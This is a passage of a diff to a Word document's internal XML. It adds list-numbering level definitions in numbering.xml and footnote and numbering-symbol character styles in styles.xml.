+        <w:ind w:left="3585" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -1292,13 +3108,27 @@
   <w:style w:type="character" w:styleId="FootnoteCharacters">
     <w:name w:val="Footnote Characters"/>
     <w:qFormat/>
-    <w:rPr/>
+    <w:rPr>
+      <w:vertAlign w:val="superscript"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="FootnoteCharactersuser">
+    <w:name w:val="Footnote Characters (user)"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:vertAlign w:val="superscript"/>
+    </w:rPr>
   </w:style>
   <w:style w:type="character" w:styleId="FootnoteReference">
     <w:name w:val="footnote reference"/>
     <w:rPr>
       <w:vertAlign w:val="superscript"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="NumberingSymbols">
+    <w:name w:val="Numbering Symbols"/>
+    <w:qFormat/>
+    <w:rPr/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading">
     <w:name w:val="Heading"/>
